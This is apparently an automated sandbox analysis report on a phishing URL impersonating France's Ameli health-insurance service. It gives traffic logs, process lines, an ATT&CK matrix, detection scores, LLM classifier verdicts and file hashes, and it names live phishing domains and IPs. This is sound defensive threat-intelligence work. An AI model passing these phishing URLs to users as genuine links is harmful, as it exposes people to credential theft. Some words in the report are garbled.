    Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
    Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49710 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49716 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 2.18.97.153:443 -> 192.168.2.6:49725 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 2.18.97.153:443 -> 192.168.2.6:49728 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49733 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49734 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49753 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49761 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49764 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49765 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49769 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49770 version: TLS 1.2
    Source: classification engineClassification label: mal64.phis.win@19/12@17/7
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1996,i,4856771794578444014,547560397401803930,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://inpzk.useringimportdulcimer.ink/?=vxkncwole9"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1996,i,4856771794578444014,547560397401803930,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
    Process Injection
    1
    Process Injection
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
    Ingress Tool Transfer
    Traffic DuplicationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    https://inpzk.useringimportdulcimer.ink/?=vxkncwole90%Avira URL Cloudsafe
    https://inpzk.useringimportdulcimer.ink/?=vxkncwole9100%SlashNextCredential Stealing type: Phishing & Social usering
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D0%URL Reputationsafe
    https://cartevitale-ameli.santeassures-informations.eu/assurance/index.html0%Avira URL Cloudsafe
    https://cartevitale-ameli.santeassures-informations.eu/?iauthentification0%Avira URL Cloudsafe
    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=89d6efe14aad728f0%Avira URL Cloudsafe
    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/89d6efe14aad728f/1720010354548/f6b3f694799fbd2dd6b2412977b9f8009ebec1e6b44163290b73627a156132ba/xjaWdIKTKn7go5y0%Avira URL Cloudsafe
    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/2115433930:1720008719:mWbT4_enhs2h_w32qRfd66TmkEtkTYfuBx_guyabV0E/89d6efe14aad728f/0228ee3c2a32d260%Avira URL Cloudsafe
    https://cartevitale-ameli.santeassures-informations.eu/index.php?authentification0%Avira URL Cloudsafe
    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/89d6efe14aad728f/1720010354549/WnI_HOuueg-89DS0%Avira URL Cloudsafe
    https://cartevitale-ameli.santeassures-informations.eu/websockets0%Avira URL Cloudsafe
    https://cartevitale-ameli.santeassures-informations.eu/favicon.ico0%Avira URL Cloudsafe
    https://cartevitale-ameli.santeassures-informations.eu/?authentification&uri=/Fi4bPy-N3Rtv-5zOg8-QNWuj-sbXEl-blGhi-4CWIj-zDacF-Pn/index.html&search=0%Avira URL Cloudsafe
    https://cartevitale-ameli.santeassures-informations.eu/?js_challenge0%Avira URL Cloudsafe
    about:srcdoc0%Avira URL Cloudsafe
    https://challenges.cloudflare.com/turnstile/v0/g/d2a97f6b6ec9/api.js0%Avira URL Cloudsafe
    https://cartevitale-ameli.santeassures-informations.eu/?captcha_image0%Avira URL Cloudsafe
    https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    bg.microsoft.map.fastly.net
    199.232.214.172
    truefalse
      unknown
      challenges.cloudflare.com
      104.17.2.184
      truefalse
        unknown
        inpzk.useringimportdulcimer.ink
        188.114.96.3
        truefalse
          unknown
          www.google.com
          142.250.186.164
          truefalse
            unknown
            megatasklines.freemyip.com
            102.48.55.178
            truefalse
              unknown
              fp2e7a.wpc.phicdn.net
              192.229.221.95
              truefalse
                unknown
                cartevitale-ameli.santeassures-informations.eu
                unknown
                unknowntrue
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/89d6efe14aad728f/1720010354548/f6b3f694799fbd2dd6b2412977b9f8009ebec1e6b44163290b73627a156132ba/xjaWdIKTKn7go5yfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/2115433930:1720008719:mWbT4_enhs2h_w32qRfd66TmkEtkTYfuBx_guyabV0E/89d6efe14aad728f/0228ee3c2a32d26false
                  • Avira URL Cloud: safe
                  unknown
                  https://cartevitale-ameli.santeassures-informations.eu/?authentification&uri=/Fi4bPy-N3Rtv-5zOg8-QNWuj-sbXEl-blGhi-4CWIj-zDacF-Pn/index.html&search=true
                  • Avira URL Cloud: safe
                  unknown
                  https://cartevitale-ameli.santeassures-informations.eu/Fi4bPy-N3Rtv-5zOg8-QNWuj-sbXEl-blGhi-4CWIj-zDacF-Pn/index.htmltrue
                    unknown
                    https://cartevitale-ameli.santeassures-informations.eu/favicon.icotrue
                    • Avira URL Cloud: safe
                    unknown
                    https://cartevitale-ameli.santeassures-informations.eu/websocketstrue
                    • Avira URL Cloud: safe
                    unknown
                    https://cartevitale-ameli.santeassures-informations.eu/?iauthentificationtrue
                    • Avira URL Cloud: safe
                    unknown
                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/89d6efe14aad728f/1720010354549/WnI_HOuueg-89DSfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://cartevitale-ameli.santeassures-informations.eu/assurance/index.htmltrue
                    • Avira URL Cloud: safe
                    unknown
                    https://cartevitale-ameli.santeassures-informations.eu/index.php?authentificationtrue
                    • Avira URL Cloud: safe
                    unknown
                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=89d6efe14aad728ffalse
                    • Avira URL Cloud: safe
                    unknown
                    https://challenges.cloudflare.com/turnstile/v0/g/d2a97f6b6ec9/api.jsfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3Dfalse
                    • URL Reputation: safe
                    unknown
                    https://cartevitale-ameli.santeassures-informations.eu/?js_challengetrue
                    • Avira URL Cloud: safe
                    unknown
                    https://inpzk.useringimportdulcimer.ink/?=vxkncwole9true
                      unknown
                      https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallbackfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://cartevitale-ameli.santeassures-informations.eu/?captcha_imagetrue
                      • Avira URL Cloud: safe
                      unknown
                      about:srcdocfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/wtoc0/0x4AAAAAAAeHHZ3q51Y71L9P/light/normalfalse
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        239.255.255.250
                        unknownReserved
                        unknownunknownfalse
                        188.114.96.3
                        inpzk.useringimportdulcimer.inkEuropean Union
                        13335CLOUDFLARENETUSfalse
                        142.250.186.164
                        www.google.comUnited States
                        15169GOOGLEUSfalse
                        102.48.55.178
                        megatasklines.freemyip.comMorocco
                        6713IAM-ASMAfalse
                        104.17.2.184
                        challenges.cloudflare.comUnited States
                        13335CLOUDFLARENETUSfalse
                        104.17.3.184
                        unknownUnited States
                        13335CLOUDFLARENETUSfalse
                        IP
                        192.168.2.6
                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1466886
                        Start date and time:2024-07-03 14:38:09 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 3m 23s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:browseurl.jbs
                        Sample URL:https://inpzk.useringimportdulcimer.ink/?=vxkncwole9
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:9
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal64.phis.win@19/12@17/7
                        EGA Information:Failed
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 142.250.186.131, 64.233.167.84, 142.250.185.142, 34.104.35.123, 40.127.169.103, 192.229.221.95, 20.3.187.198, 199.232.214.172, 172.217.18.10, 142.250.185.170, 142.250.185.106, 142.250.185.234, 142.250.186.42, 142.250.186.138, 142.250.181.234, 142.250.74.202, 142.250.185.138, 172.217.16.138, 142.250.185.202, 142.250.186.74, 142.250.184.202, 142.250.186.106, 172.217.16.202, 216.58.206.42, 52.165.164.15, 199.232.210.172
                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, clientservices.googleapis.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, clients.l.google.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtSetInformationFile calls found.
                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • VT rate limit hit for: https://inpzk.useringimportdulcimer.ink/?=vxkncwole9
                        No simulations
                        InputOutput
                        URL: https://cartevitale-ameli.santeassures-informations.eu/Fi4bPy-N3Rtv-5zOg8-QNWuj-sbXEl-blGhi-4CWIj-zDacF-Pn/index.html Model: Perplexity: mixtral-8x7b-instruct
                        {"loginform": false,"urgency": false,"captcha": true,"reasons": ["The webpage contains a CAPTCHA mechanism, as indicated by the 'Change text' and 'Submit' buttons.","While the text 'We are checking it you are not a roem please Write the following word Not readable?' may seem urgent, it is actually a standard CAPTCHA prompt and does not create a sense of urgency in the context of the webpage.","A login form is not present on the webpage."]}
                        Title: Captcha OCR: We are checking it you are not a roem please Write the following word Not readable? Change text Submit 
                        URL: https://cartevitale-ameli.santeassures-informations.eu Model: gpt-4o
                        ```json{  "phishing_score": 8,  "brands": "Ameli",  "phishing": true,  "suspicious_domain": true,  "has_prominent_loginform": false,  "has_captcha": true,  "setechniques": true,  "has_suspicious_link": false,  "legitmate_domain": "ameli.fr",  "reasons": "The URL 'cartevitale-ameli.santeassures-informations.eu' is suspicious because it uses a long and complex domain name that does not match the legitimate domain 'ameli.fr' associated with the Ameli brand. The presence of a CAPTCHA on the page is not inherently suspicious, but combined with the suspicious domain and the use of social usering techniques (such as mimicking a legitimate brand), it raises concerns. The page does not have a prominent login form, which is common in phishing sites to capture user credentials. Overall, the combination of these factors strongly suggests that this is a phishing site."}
                        No context
                        No context
                        No context
                        No context
                        No context
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with very long lines (42690)
                        Category:downloaded
                        Size (bytes):42691
                        Entropy (8bit):5.373060430099094
                        Encrypted:false
                        SSDEEP:768:PCoL1znQzlLmx0isMILdD9dBvKBI886ifvO95QPcQ+aoh0aKoS4HRGU5KdF:XQzlyx0ipuvKBb95Q5
                        MD5:985094F1486391033426C17505182792
                        SHA1:D44FF6BEF2E3D9B2F6DEAA0170458B1AE39350D4
                        SHA-256:14B108C7F687C327D6AA759FD1D255A981D5D505B241B5B968B674E3BF50B2B9
                        SHA-512:D1A8015658A82AE64F2E93341B8CA15B0057DF298DF36ACB47188B330E0327CFE0392EE1FF94B9D3BE7BC7D689BDD536A86ADB873A7ADEDE10AE45AA9A9415DB
                        Malicious:false
                        Reputation:low
                        URL:https://challenges.cloudflare.com/turnstile/v0/g/d2a97f6b6ec9/api.js
                        Preview:"use strict";(function(){function Et(e,a,r,o,c,u,g){try{var b=e[u](g),_=b.value}catch(l){r(l);return}b.done?a(_):Promise.resolve(_).then(o,c)}function wt(e){return function(){var a=this,r=arguments;return new Promise(function(o,c){var u=e.apply(a,r);function g(_){Et(u,o,c,g,b,"next",_)}function b(_){Et(u,o,c,g,b,"throw",_)}g(void 0)})}}function M(e,a){return a!=null&&typeof Symbol!="undefined"&&a[Symbol.hasInstance]?!!a[Symbol.hasInstance](e):M(e,a)}function Re(e,a,r){return a in e?Object.defineProperty(e,a,{value:r,enumerable:!0,configurable:!0,writable:!0}):e[a]=r,e}function Be(e){for(var a=1;a<arguments.length;a++){var r=arguments[a]!=null?arguments[a]:{},o=Object.keys(r);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(r).filter(function(c){return Object.getOwnPropertyDescriptor(r,c).enumerable}))),o.forEach(function(c){Re(e,c,r[c])})}return e}function fr(e,a){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                        Category:dropped
                        Size (bytes):61
                        Entropy (8bit):3.990210155325004
                        Encrypted:false
                        SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                        MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                        SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                        SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                        SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                        Malicious:false
                        Reputation:low
                        Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:PNG image data, 7 x 46, 8-bit/color RGB, non-interlaced
                        Category:downloaded
                        Size (bytes):61
                        Entropy (8bit):4.068159130770307
                        Encrypted:false
                        SSDEEP:3:yionv//thPlyRttZxflpBxl/k4E08up:6v/lhPqxflH7Tp
                        MD5:4D8EF9E948B2FE272B279EA5BFB1739D
                        SHA1:2984B0C49CED53470DE2C3EC14E776152F10AC52
                        SHA-256:B1121EEA6BC3D8B4D6671450A9AAC227C75BA4664A4B483814FFCB99C5F17149
                        SHA-512:F0622E2C17431A26177C6B60F2512A991E9FD2BA37EFF2A2788ABA60E6FD23A6601EEE36B8DC9538326315C842B8460409CE52F79BE3EBE34459D212F829070A
                        Malicious:false
                        Reputation:low
                        URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/89d6efe14aad728f/1720010354549/WnI_HOuueg-89DS
                        Preview:.PNG........IHDR.............k..z....IDAT.....$.....IEND.B`.
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                        Category:downloaded
                        Size (bytes):61
                        Entropy (8bit):3.990210155325004
                        Encrypted:false
                        SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                        MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                        SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                        SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                        SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                        Malicious:false
                        Reputation:low
                        URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
                        Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:PNG image data, 7 x 46, 8-bit/color RGB, non-interlaced
                        Category:dropped
                        Size (bytes):61
                        Entropy (8bit):4.068159130770307
                        Encrypted:false
                        SSDEEP:3:yionv//thPlyRttZxflpBxl/k4E08up:6v/lhPqxflH7Tp
                        MD5:4D8EF9E948B2FE272B279EA5BFB1739D
                        SHA1:2984B0C49CED53470DE2C3EC14E776152F10AC52
                        SHA-256:B1121EEA6BC3D8B4D6671450A9AAC227C75BA4664A4B483814FFCB99C5F17149
                        SHA-512:F0622E2C17431A26177C6B60F2512A991E9FD2BA37EFF2A2788ABA60E6FD23A6601EEE36B8DC9538326315C842B8460409CE52F79BE3EBE34459D212F829070A
                        Malicious:false
                        Reputation:low
                        Preview:.PNG........IHDR.............k..z....IDAT.....$.....IEND.B`.
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with no line terminators
                        Category:downloaded
                        Size (bytes):16
                        Entropy (8bit):3.75
                        Encrypted:false
                        SSDEEP:3:HS3Yn:y3Y
                        MD5:AA97FB60DFF7D2C2F4745E13494E91C4
                        SHA1:6915420AD80B6FD9A01954BDEF7960BB1BAFE71D
                        SHA-256:D83E84924B014EF37BB73CA55AD25276907E2834FA53CC4CE224677BF42A4418
                        SHA-512:AAEC166AED9C654076390830D789B088C2E75D42D52DBAF534280A24A67E0CC94FF710A0FA57FCF7C792CECB482EA793EBFE4A3683FBEC1DD04E2E5940878259
                        Malicious:false
                        Reputation:low
                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSEAmuxoGaQdIQ7RIFDf8DFLk=?alt=proto
                        Preview:CgkKBw3/AxS5GgA=
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with very long lines (16862), with no line terminators
                        Category:downloaded
                        Size (bytes):16862
                        Entropy (8bit):5.4427797272034075
                        Encrypted:false
                        SSDEEP:384:249ySDS0lo91/VtqOpl3yRobhAf4bYdkNg0T2ejyAW3DR9b:pyiSsMdtppl3yyhAf+NgeyAWt9b
                        MD5:4D16B9865A2D8788091DEC1EFB28EFEB
                        SHA1:B1AE14EA67FC88284EDFC491925FDB66CC049AD5
